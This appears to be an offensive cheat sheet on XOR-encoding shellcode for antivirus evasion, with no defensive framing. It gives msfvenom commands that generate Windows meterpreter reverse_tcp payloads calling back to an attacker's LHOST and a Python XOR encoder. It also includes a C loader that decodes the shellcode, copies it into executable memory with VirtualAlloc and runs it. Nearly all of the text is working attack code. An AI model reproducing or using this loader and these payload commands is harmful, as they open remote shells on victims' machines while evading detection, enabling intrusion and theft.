XOR Encryption

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw > sc.bin
python3 xor_encrypt.py -i sc.bin -o sc_xor.bin -k 0xAA

import argparse

def xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

parser = argparse.ArgumentParser()
parser.add_argument("-i", required=True, help="Input file")
parser.add_argument("-o", required=True, help="Output file")
parser.add_argument("-k", type=lambda x: int(x, 0), default=0xAA, help="XOR key byte")
args = parser.parse_args()

with open(args.i, "rb") as f: data = f.read()
with open(args.o, "wb") as f: f.write(xor(data, args.k))
print(f"Encrypted {len(data)} bytes with key 0x{args.k:02X}")

#include <windows.h>

unsigned char sc[] = { /* XOR-encrypted shellcode here */ };
#define KEY 0xAA

int main() {
    for (int i = 0; i < sizeof(sc); i++) sc[i] ^= KEY;

    void* mem = VirtualAlloc(0, sizeof(sc), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(mem, sc, sizeof(sc));
    ((void(*)())mem)();
    return 0;
}

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/xor_dynamic -f exe -o xor_payload.exe